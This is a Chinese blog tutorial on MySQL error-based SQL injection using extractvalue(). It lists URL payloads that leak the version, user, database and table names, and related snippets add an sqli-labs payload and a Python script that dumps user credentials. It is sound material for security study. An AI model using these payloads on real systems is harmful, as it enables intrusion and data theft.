【漏洞挖掘】——107、Extractvalue报错注入刨析

已于 2024-06-26 13:37:51 修改
阅读量230 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【WEB渗透】 文章标签: 报错注入 Extractvalue报错 web渗透 SQL注入 web安全
于 2024-06-21 16:03:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/139863516
Extractvalue报错注入流程

下面的语句不可以直接使用,首先需要刻画后台SQL语句的"画像",之后确定如何构造,例如使用“/?id=1 and 语句”还是“/?id=1' and 语句”等其他类型的语句。

获取数据库版本信息
  • http://www.example.com/?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e)) --+
获取用户名相关信息
  • http://www.example.com/?id=1 and extractvalue(1, concat(0x7e, (select user()),0x7e)) --+
获取数据库名的信息
  • http://www.example.com/?id=1 and extractvalue(1, concat(0x7e, (select database()),0x7e)) --+
获取数据库的表信息
  • http://www.example.com/?id=1 and extractvalue(1, concat(0x7e, (select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),0x7e)) --+

      在实际使用过程中需要更换limit start,length中的start的值,依次来获取

了解本专栏 订阅专栏 解锁全文
SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
信息安全入门——top10漏洞介绍
小白一枚多多关注的博客
05-13 1万+
web安全top10漏洞
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 1120
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
MYSQL报错注入命令
BY_永Ye
01-07 206
MYSQL报错注入流程
报错注入小结
qq_50613938的博客
06-27 739
script是一个插入脚本,网页的那些动态啥的还有别的啥的一般都这个来
SQL初实践2)SQL报错注入
m0_64417923的博客
05-07 405
使用Extractvalue函数进行报错注入: 首先,Extractvalue函数对于“~”不能识别,“~”的ASCII码对应的是0x7e。 1.查询数据库名称 id=1 and extractv 1 and extractvalue(1,concat(0x7e,(select database()))) alue("anything",concat(0x7e,(select database())))# 得到 数据库名称:sqli 2.查询表名 1 union select 1,e.
报错注入
j7ur8
06-22 2646
长期更新报错注入的知识,把代码审计这本书上的10报错姿势吃透。这是一个神奇的登陆界面-floor()报错注入这道题目....给了我新的姿势把, 第一次真正研究报错注入。题目测试很容易 输入"会报错然后就是进行报错注入,测试了一番,没有过滤。然后进行floor()的报错注入1. 开始的姿势:1" and (select 1 from (select count(*), concat(floor(r...
sql注入详解
m0_67392811的博客
06-12 6832
目录前言? ?一、漏洞原因分二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
buuctf exec
04-02
测试报错注入 对于SQL注入类的测试,可以通过构造特定的payload触发错误响应以获取敏感信息。例如,在引用中提到的payload `1' and extractvalue(1,concat(0x7e,user()))#` 可用于MySQL环境下的XPath语法错误注入[^...
学习MySQL这一篇就够了
热门推荐
轻松的小希
11-25 21万+
第一章 数据库概述 1.1、数据库的好处 将数据持久化到本地 提供结构化查询功能 1.2、数据库的常见概念 DB:数据库,存储数据的仓库 DBS:数据库管理系统,又称为数据库软件或者数据库产品,用于创建和管理DB,常见的有MySQL、Oracle、DB2、SQL Server SQL:结构化查询语言,用于和数据库通信的语言,不是某个数据库软件特有的,而是几乎所有的主流数据库软件通用的语言 1.3、数据库的存储特点 数据存放到表中,然后表再放到库中 一个库中可以有多张表,每张表具有唯一的表名用来标识
SQL注入报错注入--实战示例
m0_57347472的博客
03-20 702
mysql5.1版本及以上版本,会存在一个叫infromation_schema的默认数据库,这个数据库里面记录着整个mysql管理的数据库的名称、表名、列名(字段名)infromation_schema中的columns存的是所有的库的所有表的列的字段名信息。infromation_schema中的tables表存了各个数据库中有的表的表名。k这个字母是随便写的,写啥都行,ox7e是16进制,表示~,也可以直接写“~”若反馈错误表示只能显示一行,所以可以采用limit来一行一行显示,查看报错
extractvalue报错注入理论及实战
走马
11-07 1447
什么是报错注入构造语句,让错误信息中夹杂可以显示数据库内容的查询语句,返回报错提示中包括数据库中的内容如上图所示,通过group by的报错,我们可以知道列数是多少输入正确的查询数据库的SQL语句,虽然可以执行成功,但是页面不显示数据库的名称我们故意将database写为databasa,此时数据库的名称security在报错信息中显示了出来因此可以利用报错的信息得到我们想要的信息。1.通过floor()报错注入2.通过extractvalue()报错注入
SQL注入
qq_39480875的博客
05-22 304
转自:https://wywwzjj.top/2018/11/02/Sqli-labs-通关记录/#函数报错信息注入 MySQL 常用语句备忘 -- Default Databases mysql Requires root privileges information_schema Available from version 5 and higher Comment Out Que...
sql注入-报错注入1extractvalue()函数 报错注入
07-10 3524
报错注入extractvalue()函数的使用
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 4870
SQL注入报错注入原理
sql注入报错注入
笔墨稠思
07-07 223
本次注入采用DVWA靶场,靶场等级Low,数据库mysql 基于报错注入 利用mysql自身函数的漏洞来获取数据 例如 select * from 表 where id = 1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); select * from 表 where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 0x7e 是字符~ 的ascii 码的十六进制表
SQL注入报错注入
noob_3000的博客
08-11 708
SQL注入报错型】CTFHUB学习记录
sql注入漏洞
Enya1122的博客
02-04 1587
SQL注入:是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串中注入SQL指令,在设计的不良程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破化或入侵。代码层面的话,好像是这样的放一张看起来以后有用的图。
sql盲注_extractvalue报错注入
sugar_by的博客
06-02 1149
什么是报错注入 这是一种页面响应形式,响应过程如下: 用户1在前台页面输入检索内容------>后台将前台页面上输入的检索内容无加区别的拼成sql语句,送到数据库执行------->数据库将执行的结果无加区别的显示到前台页面上 俩个“无加区别”后台对输入输出的合理性没有做检查 也就是说输入进去的内容和输出的内容不做检查的 那什么时候用报错注入呢? 构造语句,让错误信息中夹杂可以显示数据库内容的查询语句 返回报错提示中包含数据库中的内容 命令对但是不回显 但是报错是......
在靶场中针对less-1完成基于union的联合查询的注入和使用extractvalue函数的报错注入,以获得敏感信息为目的。在过程中说明步骤的含义,报错注入中着重说明原理
最新发布
06-18
### 针对 Less-1 的 Union SQL 注入ExtractValue 报错注入 #### Union SQL 注入 在靶场环境中,`Less-1` 是一个经典的 SQL 注入练习场景。通过构造恶意输入,可以绕过正常的身份验证逻辑并获取敏感信息。以下是基于 `union` 的 SQL 注入的详细说明: Union SQL 注入的核心思想是利用 SQL 中的 `UNION` 操作符将攻击者构造的查询结果与原始查询结果合并显示[^3]。例如,可以通过以下方式构造查询字符串: ```sql ?id=1' union select 1,extractvalue(1,concat(0x7e,(select database()))),3 --+ ``` 上述语句中,`extractvalue()` 函数用于触发错误并将数据库名返回给用户[^1]。 #### ExtractValue 报错注入 ExtractValue 报错注入是一种基于错误回显的 SQL 注入技术。其核心原理是通过构造 XPath 查询表达式,使得 MySQL 在解时抛出错误,并将错误信息中的内容泄露给攻击者[^2]。 以下是具体的实现过程: 1. 使用 `extractvalue()` 函数构造恶意的 XPath 表达式。 2. 利用 `concat()` 将目标数据嵌入到 XPath 表达式中。 3. 触发 MySQL 的错误回显机制,从而获取目标数据。 例如,以下语句用于提取当前数据库名称: ```sql ?id=-1' and extractvalue(1,concat(0x7e,database())) --+ ``` 上述语句通过 `database()` 函数获取当前数据库名称,并将其嵌入到错误信息中。 #### 获取敏感信息 结合 `union` 和 `extractvalue` 技术,可以进一步获取敏感信息。例如,以下语句用于提取用户名和密码: ```sql ?id=' and (extractvalue('anything',concat('~',(select group_concat(id,username,password) from security.users)))) --+ ``` 上述语句通过 `group_concat()` 函数将用户表中的所有字段值拼接成一个字符串,并通过 `extractvalue()` 引发错误回显[^5]。 #### 报错注入原理 ExtractValue 报错注入的原理在于 MySQL 对 XPath 表达式的解机制。当 `extractvalue()` 函数接收到非法的 XPath 表达式时,MySQL 会抛出错误,并将错误信息中的内容暴露给攻击者。通过精心构造 XPath 表达式,可以将目标数据嵌入到错误信息中,从而实现数据泄露[^2]。 #### 示例代码 以下是一个完整的 Python 脚本示例,用于自动化提取敏感信息: ```python import requests url = "http://localhost/sqli-labs-master/Less-1/?id=" payload = "' and (extractvalue('anything',concat('~',(select group_concat(id,username,password) from security.users)))) --+" response = requests.get(url + payload) if "XPATH syntax error" in response.text: start_index = response.text.find("~") + 1 end_index = response.text.find("~", start_index) extracted_data = response.text[start_index:end_index] print("Extracted Data:", extracted_data) else: print("Injection failed or no data found.") ``` #### 注意事项 - 确保靶场环境已正确配置,避免对真实系统造成影响。 - 在实际渗透测试中,需严格遵守相关法律法规及道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值